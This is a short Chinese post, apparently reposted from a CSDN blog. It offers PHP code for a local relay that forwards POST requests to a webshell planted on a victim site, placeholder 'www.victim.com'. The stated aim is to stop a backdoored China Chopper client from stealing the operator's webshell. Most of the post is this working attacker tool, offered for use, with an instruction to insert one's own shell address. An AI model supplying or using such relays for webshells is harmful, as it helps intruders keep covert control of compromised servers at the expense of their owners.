通过本地中转可以很好地防止带后门的菜刀窃取webshell。PHP代码如下所示,原理自行思考,不懂的请留言
<?php $webshell="http://www.victim.com/webshell.php";//把这里改成你的shell地址 $temp=$_POST; $data = $temp; $data = http_build_query($data); $opts = array ( 'http' => array ( 'method' => 'POST', 'header'=> "Content-type: application/x-www-form-urlencoded\r\n" . "Content-Length: " . strlen($data) . "\r\n", 'content' => $data) ); $context = stream_context_create($opts); $html = @file_get_contents($webshell, false, $context); //发送post echo $html; ?>
原文:http://blog.csdn.net/nersie/article/details/41607801